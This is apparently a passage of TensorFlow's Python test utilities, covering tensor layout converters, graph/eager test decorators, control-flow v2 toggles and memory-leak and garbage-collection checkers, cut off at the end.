def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(_TABLE_SHARED_NAME_PATTERN, str(node.attr["shared_name"].s)):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
  """Whether the build reports Google CUDA support (native util-port query)."""
  return _pywrap_util_port.IsGoogleCudaEnabled()


def IsBuiltWithROCm():
  """Whether the build reports ROCm support (native util-port query)."""
  return _pywrap_util_port.IsBuiltWithROCm()


def IsBuiltWithXLA():
  """Whether the build reports XLA support (native util-port query)."""
  return _pywrap_util_port.IsBuiltWithXLA()


def IsBuiltWithNvcc():
  """Whether the build reports compilation with nvcc (native util-port query)."""
  return _pywrap_util_port.IsBuiltWithNvcc()


def GpuSupportsHalfMatMulAndConv():
  """Whether the GPU reports float16 matmul/conv support (native query)."""
  return _pywrap_util_port.GpuSupportsHalfMatMulAndConv()


def IsMklEnabled():
  """Whether the build reports MKL support (native util-port query)."""
  return _pywrap_util_port.IsMklEnabled()


def InstallStackTraceHandler():
  """Install the native stacktrace-on-crash signal handler."""
  _pywrap_stacktrace_handler.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
  """Converts the input from the NHWC format to NCHW.

  Args:
    input_tensor: a 4- or 5-D tensor, or an array representing shape

  Returns:
    converted tensor or shape array
  """
  # tensor dim -> new axis order
  new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
  if isinstance(input_tensor, ops.Tensor):
    return array_ops.transpose(input_tensor, new_axes[input_tensor.shape.ndims])
  order = new_axes[len(input_tensor)]
  return [input_tensor[axis] for axis in order]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
  """Transforms the input from the NHWC layout to NCHW_VECT_C layout.

  Note: Does not include quantization or type conversion steps, which should
  be applied afterwards.

  Args:
    input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape

  Returns:
    tensor or shape array transformed into NCHW_VECT_C

  Raises:
    ValueError: if last dimension of `input_shape_or_tensor` is not evenly
      divisible by 4.
  """
  permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
  is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
  if is_tensor:
    temp_shape = input_shape_or_tensor.shape.as_list()
  else:
    # NOTE: for a shape-list input, the caller's list is modified in place
    # below (matching the original behavior).
    temp_shape = input_shape_or_tensor
  if temp_shape[-1] % 4 != 0:
    raise ValueError(
        "Last dimension of input must be evenly divisible by 4 to convert to "
        "NCHW_VECT_C.")
  # Split the channel dimension C into (C // 4, 4).
  temp_shape[-1] //= 4
  temp_shape.append(4)
  permutation = permutations[len(temp_shape)]
  if not is_tensor:
    return [temp_shape[axis] for axis in permutation]
  reshaped = array_ops.reshape(input_shape_or_tensor, temp_shape)
  return array_ops.transpose(reshaped, permutation)
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
  """Transforms the input from the NCHW_VECT_C layout to NHWC layout.

  Note: Does not include de-quantization or type conversion steps, which should
  be applied beforehand.

  Args:
    input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape

  Returns:
    tensor or shape array transformed into NHWC

  Raises:
    ValueError: if last dimension of `input_shape_or_tensor` is not 4.
  """
  permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
  is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
  if is_tensor:
    input_shape = input_shape_or_tensor.shape.as_list()
  else:
    input_shape = input_shape_or_tensor
  if input_shape[-1] != 4:
    raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
  permutation = permutations[len(input_shape)]
  # Drop the trailing vector dim, then fold its factor back into channels.
  nhwc_shape = [input_shape[axis] for axis in permutation[:-1]]
  nhwc_shape[-1] *= input_shape[-1]
  if not is_tensor:
    return nhwc_shape
  transposed = array_ops.transpose(input_shape_or_tensor, permutation)
  return array_ops.reshape(transposed, nhwc_shape)
def NCHWToNHWC(input_tensor):
  """Converts the input from the NCHW format to NHWC.

  Args:
    input_tensor: a 4- or 5-D tensor, or an array representing shape

  Returns:
    converted tensor or shape array
  """
  # tensor dim -> new axis order
  new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
  if isinstance(input_tensor, ops.Tensor):
    return array_ops.transpose(input_tensor, new_axes[input_tensor.shape.ndims])
  order = new_axes[len(input_tensor)]
  return [input_tensor[axis] for axis in order]
def skip_if(condition):
  """Skips the decorated function if condition is or evaluates to True.

  When skipped, the wrapper returns None without calling the function.

  Args:
    condition: Either an expression that can be used in "if not condition"
      statement, or a callable whose result should be a boolean.

  Returns:
    The wrapped function
  """

  def real_skip_if(fn):

    # functools.wraps preserves the wrapped test's name/docstring, so test
    # runners report the real test rather than "wrapper".
    @functools.wraps(fn)
    def wrapper(*args, **kwargs):
      skip = condition() if callable(condition) else condition
      if not skip:
        return fn(*args, **kwargs)

    return wrapper

  return real_skip_if
@contextlib.contextmanager
def skip_if_error(test_obj, error_type, messages=None):
  """Context manager to skip cases not considered failures by the tests.

  Note that this does not work if used in setUpClass/tearDownClass.
  Usage in setUp/tearDown works fine just like regular test methods.

  Args:
    test_obj: A test object provided as `self` in the test methods; this object
      is usually an instance of `unittest.TestCase`'s subclass and should have
      `skipTest` method.
    error_type: The error type to skip. Note that if `messages` are given, both
      `error_type` and `messages` need to match for the test to be skipped.
    messages: Optional, a string or list of strings. If `None`, the test will be
      skipped if `error_type` matches what is raised; otherwise, the test is
      skipped if any of the `messages` is contained in the message of the error
      raised, and `error_type` matches the error raised.

  Yields:
    Nothing.
  """
  if messages:
    messages = nest.flatten(messages)
  try:
    yield
  except error_type as e:
    # skip only when no messages were given, or one of them matches the error
    if not messages or any(message in str(e) for message in messages):
      test_obj.skipTest("Skipping error: {}: {}".format(type(e), str(e)))
    else:
      raise
def enable_c_shapes(fn):
  """No-op. TODO(b/74620627): Remove this."""
  return fn


def with_c_shapes(cls):
  """No-op. TODO(b/74620627): Remove this."""
  return cls
def enable_control_flow_v2(fn):
  """Decorator for enabling CondV2 and WhileV2 on a test.

  Note this enables using CondV2 and WhileV2 after running the test class's
  setup/teardown methods.

  In addition to this, callers must import the while_v2 module in order to set
  the _while_v2 module in control_flow_ops.

  Args:
    fn: the function to be wrapped

  Returns:
    The wrapped function
  """

  def wrapper(*args, **kwargs):
    # Save the global flag, force-enable it, and always restore it afterwards.
    enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
    control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
    try:
      return fn(*args, **kwargs)
    finally:
      control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old

  return wrapper
def with_control_flow_v2(cls):
  """Adds methods that call original methods with WhileV2 and CondV2 enabled.

  Note this enables CondV2 and WhileV2 in new methods after running the test
  class's setup method.

  In addition to this, callers must import the while_v2 module in order to set
  the _while_v2 module in control_flow_ops.

  If a test function has _disable_control_flow_v2 attr set to True (using the
  @disable_control_flow_v2 decorator), the v2 function is not generated for it.

  Example:

  @test_util.with_control_flow_v2
  class ControlFlowTest(test.TestCase):

    def testEnabledForV2(self):
      ...

    @test_util.disable_control_flow_v2("b/xyzabc")
    def testDisabledForV2(self):
      ...

  Generated class:
  class ControlFlowTest(test.TestCase):

    def testEnabledForV2(self):
      ...

    def testEnabledForV2WithControlFlowV2(self):
      // Enable V2 flags.
      testEnabledForV2(self)
      // Restore V2 flags.

    def testDisabledForV2(self):
      ...

  Args:
    cls: class to decorate

  Returns:
    cls with new test methods added
  """
  # Nothing to do if v2 control flow is already globally enabled.
  if control_flow_util.ENABLE_CONTROL_FLOW_V2:
    return cls

  # Iterate over a copy: we add attributes to cls while iterating.
  for name, value in cls.__dict__.copy().items():
    if (callable(value) and
        name.startswith(unittest.TestLoader.testMethodPrefix) and
        not getattr(value, "_disable_control_flow_v2", False)):
      setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
  return cls
def disable_control_flow_v2(unused_msg):
  """Decorator for a function in a with_control_flow_v2 enabled test class.

  Blocks the function from being run with v2 control flow ops.

  Args:
    unused_msg: Reason for disabling.

  Returns:
    The wrapped function with _disable_control_flow_v2 attr set to True.
  """

  def mark_disabled(func):
    func._disable_control_flow_v2 = True
    return func

  return mark_disabled
def enable_output_all_intermediates(fn):
  """Force-enable outputing all intermediates from functional control flow ops.

  Args:
    fn: the function to be wrapped

  Returns:
    The wrapped function
  """

  def wrapper(*args, **kwargs):
    # Save the experimental override, force-enable it, and always restore it.
    output_all_intermediates_old = \
        control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE
    control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
    try:
      return fn(*args, **kwargs)
    finally:
      control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = \
          output_all_intermediates_old

  return wrapper
def assert_no_new_pyobjects_executing_eagerly(func=None, warmup_iters=2):
  """Decorator for asserting that no new Python objects persist after a test.

  Runs the test multiple times executing eagerly, first as a warmup and then to
  let objects accumulate. The warmup helps ignore caches which do not grow as
  the test is run repeatedly.

  Useful for checking that there are no missing Py_DECREFs in the C exercised by
  a bit of Python.

  Args:
    func: The function to test.
    warmup_iters: The numer of warmup iterations, excluded from measuring.

  Returns:
    The wrapped function performing the test.
  """

  def wrap_f(f):

    def decorator(self, *args, **kwargs):
      """Warms up, gets object counts, runs the test, checks for new objects."""
      with context.eager_mode():
        # Disable automatic collection so only our explicit collect() calls
        # decide what gets freed while we are counting objects.
        gc.disable()
        # Run the test 2 times as warmup, in an attempt to fill up caches, which
        # should not grow as the test is run repeatedly below.
        #
        # TODO(b/117156879): Running warmup twice is black magic; we have seen
        # tests that fail with 1 warmup run, and pass with 2, on various
        # versions of python2.7.x.
        for _ in range(warmup_iters):
          f(self, *args, **kwargs)
        # Some objects are newly created by _get_object_count_by_type(). So
        # create and save as a dummy variable to include it as a baseline.
        obj_count_by_type = _get_object_count_by_type()
        gc.collect()
        # Baseline count, taken after a full collection.
        obj_count_by_type = _get_object_count_by_type()
        if ops.has_default_graph():
          collection_sizes_before = {
              collection: len(ops.get_collection(collection))
              for collection in ops.get_default_graph().collections
          }
        for _ in range(3):
          f(self, *args, **kwargs)
        # Note that gc.get_objects misses anything that isn't subject to garbage
        # collection (C types). Collections are a common source of leaks, so we
        # test for collection sizes explicitly.
        if ops.has_default_graph():
          for collection_key in ops.get_default_graph().collections:
            collection = ops.get_collection(collection_key)
            size_before = collection_sizes_before.get(collection_key, 0)
            if len(collection) > size_before:
              raise AssertionError(
                  ("Collection %s increased in size from "
                   "%d to %d (current items %s).") %
                  (collection_key, size_before, len(collection), collection))
          # Make sure our collection checks don't show up as leaked memory by
          # removing references to temporary variables.
          del collection
          del collection_key
          del size_before
          del collection_sizes_before
        gc.collect()
        # There should be no new Python objects hanging around.
        obj_count_by_type = _get_object_count_by_type() - obj_count_by_type
        # In some cases (specifically on MacOS), new_count is somehow
        # smaller than previous_count.
        # Using plain assert because not all classes using this decorator
        # have assertLessEqual
        assert not obj_count_by_type, (
            "The following objects were newly created: %s" %
            str(obj_count_by_type))
        gc.enable()

    return decorator

  # Support use both with and without decorator arguments.
  if func is None:
    return wrap_f
  else:
    return wrap_f(func)
def assert_no_new_tensors(f):
  """Decorator for asserting that no new Tensors persist after a test.
  Mainly useful for checking that code using the Python C API has correctly
  manipulated reference counts.
  Clears the caches that it knows about, runs the garbage collector, then checks
  that there are no Tensor or Tensor-like objects still around. This includes
  Tensors to which something still has a reference (e.g. from missing
  Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
  of the objects has __del__ defined).
  Args:
    f: The test case to run.
  Returns:
    The decorated test case.
  """
  def decorator(self, **kwargs):
    """Finds existing Tensors, runs the test, checks for new Tensors."""
    def _is_tensorflow_object(obj):
      # Predicate for the object types we track as potential leaks.
      try:
        return isinstance(obj,
                          (ops.Tensor, variables.Variable,
                           tensor_shape.Dimension, tensor_shape.TensorShape))
      except ReferenceError:
        # If the object no longer exists, we don't care about it.
        return False
    # Record object ids (not the objects themselves) so the snapshot does not
    # itself keep anything alive.
    tensors_before = set(
        id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
    outside_executed_eagerly = context.executing_eagerly()
    # Run the test in a new graph so that collections get cleared when it's
    # done, but inherit the graph key so optimizers behave.
    outside_graph_key = ops.get_default_graph()._graph_key
    with ops.Graph().as_default():
      ops.get_default_graph()._graph_key = outside_graph_key
      if outside_executed_eagerly:
        # Preserve the caller's execution mode inside the fresh graph.
        with context.eager_mode():
          result = f(self, **kwargs)
      else:
        result = f(self, **kwargs)
    # Make an effort to clear caches, which would otherwise look like leaked
    # Tensors.
    context.context()._clear_caches()  # pylint: disable=protected-access
    gc.collect()
    # Anything of a tracked type whose id was not present before the test ran
    # is reported as a leak.
    tensors_after = [
        obj for obj in gc.get_objects()
        if _is_tensorflow_object(obj) and id(obj) not in tensors_before
    ]
    if tensors_after:
      raise AssertionError(("%d Tensors not deallocated after test: %s" % (
          len(tensors_after),
          str(tensors_after),
      )))
    return result
  return decorator
def _find_reference_cycle(objects, idx):
  """Logs one reference cycle reachable from `objects[idx]`, if any.
  Builds a referrer graph starting at the given object and searches it for a
  cycle, logging a human-readable description of the cycle via `logging.error`.
  Args:
    objects: Sequence of candidate objects (typically `gc.garbage`).
    idx: Index into `objects` of the object to start from.
  Returns:
    True if a cycle was found (and logged), False otherwise.
  """
  def get_ignore_reason(obj, blacklist):
    """Tests whether an object should be omitted from the dependency graph."""
    # The blacklist grows by one entry per recursion level in build_ref_graph,
    # so its length doubles as a recursion-depth limit.
    if len(blacklist) > 100:
      return "<depth limit>"
    if tf_inspect.isframe(obj):
      if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
        return "<test code>"
    for b in blacklist:
      if b is obj:
        return "<test code>"
    if obj is blacklist:
      return "<test code>"
    return None
  # Note: this function is meant to help with diagnostics. Its output is purely
  # a human-readable representation, so you may freely modify it to suit your
  # needs.
  def describe(obj, blacklist, leaves_only=False):
    """Returns a custom human-readable summary of obj.
    Args:
      obj: the value to describe.
      blacklist: same as blacklist in get_ignore_reason.
      leaves_only: boolean flag used when calling describe recursively. Useful
        for summarizing collections.
    """
    if get_ignore_reason(obj, blacklist):
      return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
    if tf_inspect.isframe(obj):
      return "frame: {}".format(tf_inspect.getframeinfo(obj))
    elif tf_inspect.ismodule(obj):
      return "module: {}".format(obj.__name__)
    else:
      if leaves_only:
        return "{}, {}".format(type(obj), id(obj))
      elif isinstance(obj, list):
        return "list({}): {}".format(
            id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
      elif isinstance(obj, tuple):
        return "tuple({}): {}".format(
            id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
      elif isinstance(obj, dict):
        return "dict({}): {} keys".format(id(obj), len(obj.keys()))
      elif tf_inspect.isfunction(obj):
        return "function({}) {}; globals ID: {}".format(
            id(obj), obj.__name__, id(obj.__globals__))
      else:
        return "{}, {}".format(type(obj), id(obj))
  def build_ref_graph(obj, graph, reprs, blacklist):
    """Builds a reference graph as <referrer> -> <list of referents>.
    Args:
      obj: The object to start from. The graph will be built by recursively
        adding its referrers.
      graph: Dict holding the graph to be built. To avoid creating extra
        references, the graph holds object IDs rather than actual objects.
      reprs: Auxiliary structure that maps object IDs to their human-readable
        description.
      blacklist: List of objects to ignore.
    """
    referrers = gc.get_referrers(obj)
    # Add the referrers list itself to the blacklist so it is not reported as
    # a referrer; this also advances the depth limit in get_ignore_reason.
    blacklist = blacklist + (referrers,)
    obj_id = id(obj)
    for r in referrers:
      if get_ignore_reason(r, blacklist) is None:
        r_id = id(r)
        if r_id not in graph:
          graph[r_id] = []
        if obj_id not in graph[r_id]:
          graph[r_id].append(obj_id)
          # Only recurse on the first time an edge is discovered, so each
          # referrer is expanded at most once per referent.
          build_ref_graph(r, graph, reprs, blacklist)
          reprs[r_id] = describe(r, blacklist)
  def find_cycle(el, graph, reprs, path):
    """Finds and prints a single cycle in the dependency graph."""
    if el not in graph:
      return
    for r in graph[el]:
      if r in path:
        # Revisiting a node already on the current path means a cycle.
        logging.error("Reference cycle sample:")
        for p in path + (r,):
          logging.error(reprs.get(p, "unknown object " + str(p)))
        return True
      else:
        if find_cycle(r, graph, reprs, path + (r,)):
          return True
    return False
  obj = objects[idx]
  graph = {}  # referrer ID -> object ID
  reprs = {}  # object ID -> description
  # Blacklist this function's own locals/helpers so the search does not chase
  # references created by the diagnostic machinery itself.
  build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
                                      describe, build_ref_graph, find_cycle))
  for k in graph:
    if find_cycle(k, graph, reprs, ()):
      return True
  return False
def assert_no_garbage_created(f):
  """Test method decorator to assert that no garbage has been created.
  Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
  cannot be un-set (i.e. will disable garbage collection for any other unit
  tests in the same file/shard).
  Args:
    f: The function to decorate.
  Returns:
    The decorated function.
  """
  def decorator(self, **kwargs):
    """Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
    # Force-load `distribution_strategy_context` to prevent GC at
    # test time when using eager. Remove once b/117329403 is resolved.
    tape.distribution_strategy_context.get_strategy()
    gc.disable()
    previous_debug_flags = gc.get_debug()
    # DEBUG_SAVEALL diverts every unreachable object into gc.garbage instead
    # of freeing it, so leaked cycles can be inspected below.
    gc.set_debug(gc.DEBUG_SAVEALL)
    gc.collect()
    previous_garbage = len(gc.garbage)
    result = f(self, **kwargs)
    gc.collect()
    new_garbage = len(gc.garbage)
    if new_garbage > previous_garbage:
      # Log a detailed description of each newly garbage-collected object
      # before failing, to help diagnose the reference cycle.
      logging.error(
          "The decorated test created work for Python's garbage collector, "
          "likely due to a reference cycle. New objects in cycle(s):")
      for i, obj in enumerate(gc.garbage[previous_garbage:]):
        try:
          logging.error("Object %d of %d", i,
                        len(gc.garbage) - previous_garbage)
          def _safe_object_str(obj):
            # Avoid calling the object's own __str__, which may itself raise.
            return "<%s %d>" % (obj.__class__.__name__, id(obj))
          logging.error(" Object type: %s", _safe_object_str(obj))
          logging.error(
              " Referrer types: %s", ", ".join(
                  [_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
          logging.error(
              " Referent types: %s", ", ".join(
                  [_safe_object_str(ref) for ref in gc.get_referents(obj)]))
          logging.error(" Object attribute names: %s", dir(obj))
          logging.error(" Object __str__:")
          logging.error(obj)
          logging.error(" Object __repr__:")
          logging.error(repr(obj))
        except Exception:  # pylint: disable=broad-except
          # Diagnostics are best-effort; never let them mask the real failure.
          logging.error("(Exception while printing object)")
    # When garbage is created, this call can help identify reference cycles,
    # which are typically the cause of such garbage.
    if new_garbage > previous_garbage:
      for i in range(previous_garbage, new_garbage):
        if _find_reference_cycle(gc.garbage, i):
          break
    # This will fail if any garbage has been created, typically because of a
    # reference cycle.
    self.assertEqual(previous_garbage, new_garbage)
    # TODO(allenl): Figure out why this debug flag reset doesn't work. It would
    # be nice to be able to decorate arbitrary tests in a large test suite and
    # not hold on to every object in other tests.
    gc.set_debug(previous_debug_flags)
    gc.enable()
    return result
  return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
sort_by_key = lambda k: k[0]
combinations = []
for key, values in sorted(kwargs.items(), key=sort_by_key):
if not isinstance(values, list):
values = [values]
combinations.append([(key, value) for value in values])
return [OrderedDict(result) for result in itertools.product(*combinations)]
def generate_combinations_with_testcase_name(**kwargs):
  """Generate combinations based on its keyword arguments using combine().
  This function calls combine() and appends a testcase name to the list of
  dictionaries returned. The 'testcase_name' key is a required for named
  parameterized tests.
  Args:
    **kwargs: keyword arguments of form `option=[possibilities, ...]` or
      `option=the_only_possibility`.
  Returns:
    a list of dictionaries for each combination. Keys in the dictionaries are
    the keyword argument names. Each key has one value - one of the
    corresponding keyword argument values.
  """
  named_combinations = []
  for combination in _combine_named_parameters(**kwargs):
    assert isinstance(combination, OrderedDict)
    # Build a name suffix from the alphanumeric characters of each key/value.
    suffix = "".join(
        "_{}_{}".format("".join(filter(str.isalnum, key)),
                        "".join(filter(str.isalnum, str(value))))
        for key, value in combination.items())
    named = OrderedDict(combination)
    named["testcase_name"] = "_test{}".format(suffix)
    named_combinations.append(named)
  return named_combinations
def run_all_in_graph_and_eager_modes(cls):
  """Execute all test methods in the given class with and without eager."""
  for attr_name in dir(cls):
    # Skip non-test attributes, explicitly eager-skipped tests, and the
    # special `test_session` helper.
    is_test = attr_name.startswith(unittest.TestLoader.testMethodPrefix)
    if (not is_test or attr_name.startswith("testSkipEager") or
        attr_name.startswith("test_skip_eager") or
        attr_name == "test_session"):
      continue
    attr = getattr(cls, attr_name, None)
    if callable(attr):
      setattr(cls, attr_name, run_in_graph_and_eager_modes(attr))
  return cls
def build_as_function_and_v1_graph(func=None):
  """Run a test case in v1 graph mode and inside tf.function in eager mode.
  WARNING: This decorator can only be used in test cases that statically checks
  generated graph. Attempting to evaluate graph or function results via.
  session.run() or self.evaluate() will fail.
  WARNING: This decorator can only be used for test cases that inherit from
  absl.testing.parameterized.TestCase.
  Args:
    func: Test case function to be decorated.
  Returns:
    Decorated test case function.
  """
  def decorator(f):
    if tf_inspect.isclass(f):
      raise ValueError(
          "`run_in_graph_mode_and_function` only supports test methods.")
    @parameterized.named_parameters(("_v1_graph", "v1_graph"),
                                    ("_function", "function"))
    @functools.wraps(f)
    def decorated(self, run_mode, *args, **kwargs):
      if run_mode == "v1_graph":
        with ops.Graph().as_default():
          f(self, *args, **kwargs)
      elif run_mode == "function":
        @def_function.function
        def function_in_eager():
          f(self, *args, **kwargs)
        # Create a new graph for the eagerly executed version of this test for
        # better isolation.
        graph_for_eager_test = ops.Graph()
        with graph_for_eager_test.as_default(), context.eager_mode():
          function_in_eager()
        ops.dismantle_graph(graph_for_eager_test)
      else:
        # Bug fix: this previously did `return ValueError(...)`, which
        # silently returned the exception object instead of raising it.
        raise ValueError("Unknown run mode %s" % run_mode)
    return decorated
  if func is not None:
    return decorator(func)
  return decorator
def run_in_async_and_sync_mode(f):
  """Execute the test in async mode and sync mode."""
  @parameterized.named_parameters([("Async", True), ("", False)])
  @functools.wraps(f)
  def decorator(self, async_mode, *args, **kwargs):
    # Select the execution mode from the parameter, then run under it.
    mode = context.ASYNC if async_mode else context.SYNC
    with context.execution_mode(mode):
      f(self, *args, **kwargs)
  return decorator
def eager_lazy_remote_copy_on_and_off(f):
  """Execute the test method w/o lazy tensor copy for function remote inputs."""
  @parameterized.named_parameters([("WithLazyRemoteCopy", True), ("", False)])
  @functools.wraps(f)
  def decorator(self, lazily_remote_copy, *args, **kwargs):
    # The parameter is already the desired boolean value; assign it directly
    # instead of the previous redundant if/else branches.
    context.context().lazy_remote_inputs_copy = lazily_remote_copy
    f(self, *args, **kwargs)
  return decorator
def run_in_graph_and_eager_modes(func=None,
                                 config=None,
                                 use_gpu=True,
                                 assert_no_eager_garbage=False):
  """Execute the decorated test with and without enabling eager execution.
  This function returns a decorator intended to be applied to test methods in
  a `tf.test.TestCase` class. Doing so will cause the contents of the test
  method to be executed twice - once normally, and once with eager execution
  enabled. This allows unittests to confirm the equivalence between eager
  and graph execution (see `tf.compat.v1.enable_eager_execution`).
  For example, consider the following unittest:
  ```python
  class MyTests(tf.test.TestCase):
    @run_in_graph_and_eager_modes
    def test_foo(self):
      x = tf.constant([1, 2])
      y = tf.constant([3, 4])
      z = tf.add(x, y)
      self.assertAllEqual([4, 6], self.evaluate(z))
  if __name__ == "__main__":
    tf.test.main()
  ```
  This test validates that `tf.add()` has the same behavior when computed with
  eager execution enabled as it does when constructing a TensorFlow graph and
  executing the `z` tensor in a session.
  `deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
  `run_in_graph_and_eager_modes` are available decorators for different
  v1/v2/eager/graph combinations.
  Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator the can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.
    config: An optional config_pb2.ConfigProto to use to configure the session
      when executing graphs.
    use_gpu: If True, attempt to run as many operations as possible on GPU.
    assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
      collector and asserts that no extra garbage has been created when running
      the test with eager execution enabled. This will fail if there are
      reference cycles (e.g. a = []; a.append(a)). Off by default because some
      tests may create garbage for legitimate reasons (e.g. they define a class
      which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
      Python interpreters (meaning that tests which rely on objects being
      collected elsewhere in the unit test file will not work). Additionally,
      checks that nothing still has a reference to Tensors that the test
      allocated.
  Returns:
    Returns a decorator that will run the decorated test method twice:
    once by constructing and executing a graph in a session and once with
    eager execution enabled.
  """
  def decorator(f):
    if tf_inspect.isclass(f):
      raise ValueError(
          "`run_in_graph_and_eager_modes` only supports test methods. "
          "Did you mean to use `run_all_in_graph_and_eager_modes`?")
    def decorated(self, *args, **kwargs):
      # First pass: run the test in graph mode inside a test session. A
      # SkipTest here only skips the graph pass; the eager pass still runs.
      try:
        with context.graph_mode():
          with self.test_session(use_gpu=use_gpu, config=config):
            f(self, *args, **kwargs)
      except unittest.case.SkipTest:
        pass
      # NOTE: run_eagerly closes over `args` from `decorated`; only `kwargs`
      # is passed through its own parameter list.
      def run_eagerly(self, **kwargs):
        if not use_gpu:
          with ops.device("/device:CPU:0"):
            f(self, *args, **kwargs)
        else:
          f(self, *args, **kwargs)
      if assert_no_eager_garbage:
        ops.reset_default_graph()
        run_eagerly = assert_no_new_tensors(
            assert_no_garbage_created(run_eagerly))
      # This decorator runs the wrapped test twice.
      # Reset the test environment between runs.
      self.tearDown()
      self._tempdir = None
      # Create a new graph for the eagerly executed version of this test for
      # better isolation.
      graph_for_eager_test = ops.Graph()
      with graph_for_eager_test.as_default(), context.eager_mode():
        self.setUp()
        run_eagerly(self, **kwargs)
      ops.dismantle_graph(graph_for_eager_test)
    return tf_decorator.make_decorator(f, decorated)
  if func is not None:
    return decorator(func)
  return decorator
def py_func_if_in_function(f):
  """Calls `f` directly, or via py_func when inside a tf.function."""
  def decorated(*args, **kwds):
    if not ops.inside_function():
      return f(*args, **kwds)
    # Collect the positional arguments that are tensors/variables, together
    # with the positions they came from.
    indexed_tensors = [(pos, arg) for pos, arg in enumerate(args)
                       if isinstance(arg, (ops.Tensor, variables.Variable))]
    tensor_indices = [pos for pos, _ in indexed_tensors]
    tensor_args = [arg for _, arg in indexed_tensors]
    def inner_f(*inner_tensor_args):
      # Substitute the py_func-provided tensors back into their original
      # argument positions before calling f.
      replaced_args = list(args)
      for pos, tensor in zip(tensor_indices, inner_tensor_args):
        replaced_args[pos] = tensor
      return f(*replaced_args, **kwds)
    return script_ops.py_func(inner_f, tensor_args, [])
  return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
  """Runs the decorated test twice--once as is, once inside a tf.function.
  This allows you to run a test both in eager execution and inside a
  tf.function, exercising the two execution modes supported in tf 2.0. The test
  assertions are automatically done inside tf.py_funcs, and tf.function ensures
  that they run in the proper order and with the proper side effects.
  Currently variable creation is not supported in tests annotated with this
  decorator since it's tricky to ensure the variable doesn't get repeatedly
  created when retracing the tf.function.
  Args:
    f: the test method to be decorated
  Returns:
    The decorated test method, which will run both in eager and inside a
    tf.function.
  """
  def decorated(*args, **kwds):
    def run_f():
      f(*args, **kwds)
    with context.eager_mode():
      # Pass 1: plain eager execution.
      run_f()
      # Pass 2: the same body traced into a tf.function.
      # TODO(b/121143941): Remove the autograph override.
      def_function.function(run_f, autograph=False)()
  return decorated
def deprecated_graph_mode_only(func=None):
  """Execute the decorated test in graph mode.
  This function returns a decorator intended to be applied to tests that are not
  compatible with eager mode. When this decorator is applied, the test body will
  be run in an environment where API calls construct graphs instead of executing
  eagerly.
  `deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
  `run_in_graph_and_eager_modes` are available decorators for different
  v1/v2/eager/graph combinations.
  Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator the can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.
  Returns:
    Returns a decorator that will run the decorated test method in graph mode.
  """
  def decorator(f):
    if tf_inspect.isclass(f):
      # Recursively decorate setUp and every test method of the class.
      setup = f.__dict__.get("setUp")
      if setup is not None:
        setattr(f, "setUp", decorator(setup))
      for name, value in f.__dict__.copy().items():
        if (callable(value) and
            name.startswith(unittest.TestLoader.testMethodPrefix)):
          setattr(f, name, decorator(value))
      return f
    def decorated(self, *args, **kwargs):
      # Only force graph mode when the caller is currently eager; otherwise
      # run the test unchanged.
      if context.executing_eagerly():
        with context.graph_mode():
          return f(self, *args, **kwargs)
      return f(self, *args, **kwargs)
    return decorated
  if func is not None:
    return decorator(func)
  return decorator
# Alias: `run_deprecated_v1` is the same decorator as
